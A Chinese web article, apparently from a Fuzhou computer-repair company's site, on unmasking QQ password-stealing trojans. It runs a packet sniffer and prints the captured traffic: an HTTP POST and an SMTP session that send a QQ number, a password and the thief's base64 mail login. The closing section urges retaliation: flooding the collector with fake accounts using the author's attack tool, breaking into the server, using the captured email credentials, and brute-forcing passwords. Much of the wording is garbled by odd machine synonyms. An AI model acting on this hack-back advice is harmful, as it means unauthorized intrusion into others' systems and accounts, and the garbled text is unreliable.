如何冷静应对偷QQ程序
现在盗QQ的步伐越做越好了。粉碎锁后图标弄成和正常的一样。这就让人郁闷了。
不外不要紧,让我来教你怎样对付它!
首先准备好家伙
:X-SNIFF
进入X-SNIFF地点目录后
运行下令:xsniff -tcp -asc -pass -log qq.txt
===========================
小知识:
为什么要输入这下令呢?
-tcp
嗅探全部通过TCP协议传输的包
tcp嗅探形式最好配合-asc参数 以ASCII形式输入嗅探数据
这样像“阿拉”那些用ASP来收信的木马的收信地点就会被我们嗅到了!
-pass
嗅探暗码
用此参数,可以嗅探到用EMAIL收信的QQ木马的相应EMAIL及帐号暗码
===========================
然后打开QQ登岸窗口
随便输入一个QQ号和暗码然后登岸
等呈现正登岸的窗口时就可以关掉QQ了(当然,你也可以等到暗码报错时关甚至使用真的QQ)
这时,不论是ASP收信还是EMAIL收信的盗QQ木马都会现出本相
例子1:
阿拉的ASP收信形式(嗅探效果)
POST /ald/tmdqq.asp HTTP/1.1
Accept: Accept: */*, /ald/tmdqq.asp, 192.168.0.6
Content-Type: application/x-www-form-urlencoded
User-Agent: MyApp
Host: http:// 192.168.0.6/ald/tmdqq.asp
Content-Length: 25
Cache-Control: no-cache
Cookie: ASPSESSIONIDCCTQCARD=GFNGKMAAILIKOIBLPJAOOFON
num=74444444&pass=netpatch
他的收信地点为:
http:// 192.168.0.6/ald/tmdqq.asp
收信参数为
num=74444444&pass=netpatch
提交形式为:
http:// 192.168.0.6/ald/tmdqq.asp?num=74444444&pass=netpatch
例子2:
阿拉的Email收信形式(嗅探效果)
TCP 192.168.0.77->202.108.5.141 Port: 1049->25
Bytes=12 TTL=128 Len=80 ---PA-
AUTH LOGIN //恳求登岸邮件办事器
TCP 202.108.5.141->192.168.0.77 Port: 25->1049
Bytes=18 TTL=52 Len=80 ---PA-
334 dXNlcm5hbWU6 //办事器要求输入用户名
TCP 192.168.0.77->202.108.5.141 Port: 1049->25
Bytes=10 TTL=128 Len=80 ---PA-
dHJ5NHFx //盗贼的EMAIL的ID(base64加密)
TCP 202.108.5.141->192.168.0.77 Port: 25->1049
Bytes=18 TTL=52 Len=80 ---PA-
334 UGFzc3dvcmQ6 //办事器要求输入EMAIL登岸暗码
TCP 192.168.0.77->202.108.5.141 Port: 1049->25
Bytes=10 TTL=128 Len=80 ---PA-
NzQxODUy //盗贼的EMAIL登岸暗码(base64加密)
TCP 202.108.5.141->192.168.0.77 Port: 25->1049
Bytes=31 TTL=52 Len=80 ---PA-
235 Authentication successful //办事器反馈登岸成功标志
TCP 192.168.0.77->202.108.5.141 Port: 1049->25
Bytes=29 TTL=128 Len=80 ---PA-
MAIL FROM:
TCP 202.108.5.141->192.168.0.77 Port: 25->1049
Bytes=13 TTL=52 Len=80 ---PA-
250 Mail OK //反馈设置信息
TCP 192.168.0.77->202.108.5.141 Port: 1049->25
Bytes=27 TTL=128 Len=80 ---PA-
RCPT T
TCP 202.108.5.141->192.168.0.77 Port: 25->1049
Bytes=13 TTL=52 Len=80 ---PA-
250 Mail OK //反馈设置信息
TCP 192.168.0.77->202.108.5.141 Port: 1049->25
Bytes=6 TTL=128 Len=80 ---PA-
DATA
TCP 202.108.5.141->192.168.0.77 Port: 25->1049
Bytes=37 TTL=52 Len=80 ---PA-
354 End data with
TCP 192.168.0.77->202.108.5.141 Port: 1049->25
Bytes=345 TTL=128 Len=80 ---PA-
From: ................
T
Subject:77777----netpatch //QQ号码和暗码
Content-Type: text/html; charset="GB2312"
L9NTdhkmuwwx113368ACGHJLNQQSUW
------------------------------
....:77777
....:netpatch
------------------------------
IP....:218.104.xxx.xxx
........:................
这时,我们可以有2种要领对付这种偷QQ的
1。用我写的 啊拉ASP收信 攻击步伐,发他几万个加QQ和暗码已往让他试个爽
2。渗透那办事器。
对付EMAIL接收的,如果对方只用一个EMAIL,那就简略了,拿到暗码和ID,你说能做什么呢?如果对方用两个EMAIL,就看你的运气啦,看看暗码是否雷同或相近?用社会工程学或爆破其暗码!
再不可,还是一样,发一堆假的已往。大概再想别的措施。
其他的盗Q步伐基真雷同。我就不多说了。
=========================
有什么错误,请品评指正!
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
评论加载中...
|